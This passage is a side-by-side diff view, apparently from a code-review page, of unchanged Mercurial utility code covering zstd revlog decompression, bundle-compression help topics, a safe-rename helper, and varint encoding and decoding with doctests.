3856 dobj = self._dctx.decompressobj()
3862 dobj = self._dctx.decompressobj()
3857 chunks = []
3863 chunks = []
3858 pos = 0
3864 pos = 0
3859 while pos < insize:
3865 while pos < insize:
3860 pos2 = pos + self._decompinsize
3866 pos2 = pos + self._decompinsize
3861 chunk = dobj.decompress(data[pos:pos2])
3867 chunk = dobj.decompress(data[pos:pos2])
3862 if chunk:
3868 if chunk:
3863 chunks.append(chunk)
3869 chunks.append(chunk)
3864 pos = pos2
3870 pos = pos2
3865 # Frame should be exhausted, so no finish() API.
3871 # Frame should be exhausted, so no finish() API.
3866
3872
3867 return ''.join(chunks)
3873 return ''.join(chunks)
3868 except Exception as e:
3874 except Exception as e:
3869 raise error.StorageError(_('revlog decompress error: %s') %
3875 raise error.StorageError(_('revlog decompress error: %s') %
3870 stringutil.forcebytestr(e))
3876 stringutil.forcebytestr(e))
3871
3877
3872 def revlogcompressor(self, opts=None):
3878 def revlogcompressor(self, opts=None):
3873 opts = opts or {}
3879 opts = opts or {}
3874 return self.zstdrevlogcompressor(self._module,
3880 return self.zstdrevlogcompressor(self._module,
3875 level=opts.get('level', 3))
3881 level=opts.get('level', 3))
3876
3882
3877 compengines.register(_zstdengine())
3883 compengines.register(_zstdengine())
3878
3884
3879 def bundlecompressiontopics():
3885 def bundlecompressiontopics():
3880 """Obtains a list of available bundle compressions for use in help."""
3886 """Obtains a list of available bundle compressions for use in help."""
3881 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3887 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3882 items = {}
3888 items = {}
3883
3889
3884 # We need to format the docstring. So use a dummy object/type to hold it
3890 # We need to format the docstring. So use a dummy object/type to hold it
3885 # rather than mutating the original.
3891 # rather than mutating the original.
3886 class docobject(object):
3892 class docobject(object):
3887 pass
3893 pass
3888
3894
3889 for name in compengines:
3895 for name in compengines:
3890 engine = compengines[name]
3896 engine = compengines[name]
3891
3897
3892 if not engine.available():
3898 if not engine.available():
3893 continue
3899 continue
3894
3900
3895 bt = engine.bundletype()
3901 bt = engine.bundletype()
3896 if not bt or not bt[0]:
3902 if not bt or not bt[0]:
3897 continue
3903 continue
3898
3904
3899 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3905 doc = b'``%s``\n %s' % (bt[0], pycompat.getdoc(engine.bundletype))
3900
3906
3901 value = docobject()
3907 value = docobject()
3902 value.__doc__ = pycompat.sysstr(doc)
3908 value.__doc__ = pycompat.sysstr(doc)
3903 value._origdoc = engine.bundletype.__doc__
3909 value._origdoc = engine.bundletype.__doc__
3904 value._origfunc = engine.bundletype
3910 value._origfunc = engine.bundletype
3905
3911
3906 items[bt[0]] = value
3912 items[bt[0]] = value
3907
3913
3908 return items
3914 return items
3909
3915
3910 i18nfunctions = bundlecompressiontopics().values()
3916 i18nfunctions = bundlecompressiontopics().values()
3911
3917
3912 # convenient shortcut
3918 # convenient shortcut
3913 dst = debugstacktrace
3919 dst = debugstacktrace
3914
3920
3915 def safename(f, tag, ctx, others=None):
3921 def safename(f, tag, ctx, others=None):
3916 """
3922 """
3917 Generate a name that it is safe to rename f to in the given context.
3923 Generate a name that it is safe to rename f to in the given context.
3918
3924
3919 f: filename to rename
3925 f: filename to rename
3920 tag: a string tag that will be included in the new name
3926 tag: a string tag that will be included in the new name
3921 ctx: a context, in which the new name must not exist
3927 ctx: a context, in which the new name must not exist
3922 others: a set of other filenames that the new name must not be in
3928 others: a set of other filenames that the new name must not be in
3923
3929
3924 Returns a file name of the form oldname~tag[~number] which does not exist
3930 Returns a file name of the form oldname~tag[~number] which does not exist
3925 in the provided context and is not in the set of other names.
3931 in the provided context and is not in the set of other names.
3926 """
3932 """
3927 if others is None:
3933 if others is None:
3928 others = set()
3934 others = set()
3929
3935
3930 fn = '%s~%s' % (f, tag)
3936 fn = '%s~%s' % (f, tag)
3931 if fn not in ctx and fn not in others:
3937 if fn not in ctx and fn not in others:
3932 return fn
3938 return fn
3933 for n in itertools.count(1):
3939 for n in itertools.count(1):
3934 fn = '%s~%s~%s' % (f, tag, n)
3940 fn = '%s~%s~%s' % (f, tag, n)
3935 if fn not in ctx and fn not in others:
3941 if fn not in ctx and fn not in others:
3936 return fn
3942 return fn
3937
3943
3938 def readexactly(stream, n):
3944 def readexactly(stream, n):
3939 '''read n bytes from stream.read and abort if less was available'''
3945 '''read n bytes from stream.read and abort if less was available'''
3940 s = stream.read(n)
3946 s = stream.read(n)
3941 if len(s) < n:
3947 if len(s) < n:
3942 raise error.Abort(_("stream ended unexpectedly"
3948 raise error.Abort(_("stream ended unexpectedly"
3943 " (got %d bytes, expected %d)")
3949 " (got %d bytes, expected %d)")
3944 % (len(s), n))
3950 % (len(s), n))
3945 return s
3951 return s
3946
3952
3947 def uvarintencode(value):
3953 def uvarintencode(value):
3948 """Encode an unsigned integer value to a varint.
3954 """Encode an unsigned integer value to a varint.
3949
3955
3950 A varint is a variable length integer of 1 or more bytes. Each byte
3956 A varint is a variable length integer of 1 or more bytes. Each byte
3951 except the last has the most significant bit set. The lower 7 bits of
3957 except the last has the most significant bit set. The lower 7 bits of
3952 each byte store the 2's complement representation, least significant group
3958 each byte store the 2's complement representation, least significant group
3953 first.
3959 first.
3954
3960
3955 >>> uvarintencode(0)
3961 >>> uvarintencode(0)
3956 '\\x00'
3962 '\\x00'
3957 >>> uvarintencode(1)
3963 >>> uvarintencode(1)
3958 '\\x01'
3964 '\\x01'
3959 >>> uvarintencode(127)
3965 >>> uvarintencode(127)
3960 '\\x7f'
3966 '\\x7f'
3961 >>> uvarintencode(1337)
3967 >>> uvarintencode(1337)
3962 '\\xb9\\n'
3968 '\\xb9\\n'
3963 >>> uvarintencode(65536)
3969 >>> uvarintencode(65536)
3964 '\\x80\\x80\\x04'
3970 '\\x80\\x80\\x04'
3965 >>> uvarintencode(-1)
3971 >>> uvarintencode(-1)
3966 Traceback (most recent call last):
3972 Traceback (most recent call last):
3967 ...
3973 ...
3968 ProgrammingError: negative value for uvarint: -1
3974 ProgrammingError: negative value for uvarint: -1
3969 """
3975 """
3970 if value < 0:
3976 if value < 0:
3971 raise error.ProgrammingError('negative value for uvarint: %d'
3977 raise error.ProgrammingError('negative value for uvarint: %d'
3972 % value)
3978 % value)
3973 bits = value & 0x7f
3979 bits = value & 0x7f
3974 value >>= 7
3980 value >>= 7
3975 bytes = []
3981 bytes = []
3976 while value:
3982 while value:
3977 bytes.append(pycompat.bytechr(0x80 | bits))
3983 bytes.append(pycompat.bytechr(0x80 | bits))
3978 bits = value & 0x7f
3984 bits = value & 0x7f
3979 value >>= 7
3985 value >>= 7
3980 bytes.append(pycompat.bytechr(bits))
3986 bytes.append(pycompat.bytechr(bits))
3981
3987
3982 return ''.join(bytes)
3988 return ''.join(bytes)
3983
3989
3984 def uvarintdecodestream(fh):
3990 def uvarintdecodestream(fh):
3985 """Decode an unsigned variable length integer from a stream.
3991 """Decode an unsigned variable length integer from a stream.
3986
3992
3987 The passed argument is anything that has a ``.read(N)`` method.
3993 The passed argument is anything that has a ``.read(N)`` method.
3988
3994
3989 >>> try:
3995 >>> try:
3990 ... from StringIO import StringIO as BytesIO
3996 ... from StringIO import StringIO as BytesIO
3991 ... except ImportError:
3997 ... except ImportError:
3992 ... from io import BytesIO
3998 ... from io import BytesIO
3993 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3999 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3994 0
4000 0
3995 >>> uvarintdecodestream(BytesIO(b'\\x01'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3996 1
4002 1
3997 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
4003 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3998 127
4004 127
3999 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4005 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
4000 1337
4006 1337
4001 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4007 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4002 65536
4008 65536
4003 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4009 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4004 Traceback (most recent call last):
4010 Traceback (most recent call last):
4005 ...
4011 ...
4006 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4012 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4007 """
4013 """
4008 result = 0
4014 result = 0
4009 shift = 0
4015 shift = 0
4010 while True:
4016 while True:
4011 byte = ord(readexactly(fh, 1))
4017 byte = ord(readexactly(fh, 1))
4012 result |= ((byte & 0x7f) << shift)
4018 result |= ((byte & 0x7f) << shift)
4013 if not (byte & 0x80):
4019 if not (byte & 0x80):
4014 return result
4020 return result
4015 shift += 7
4021 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now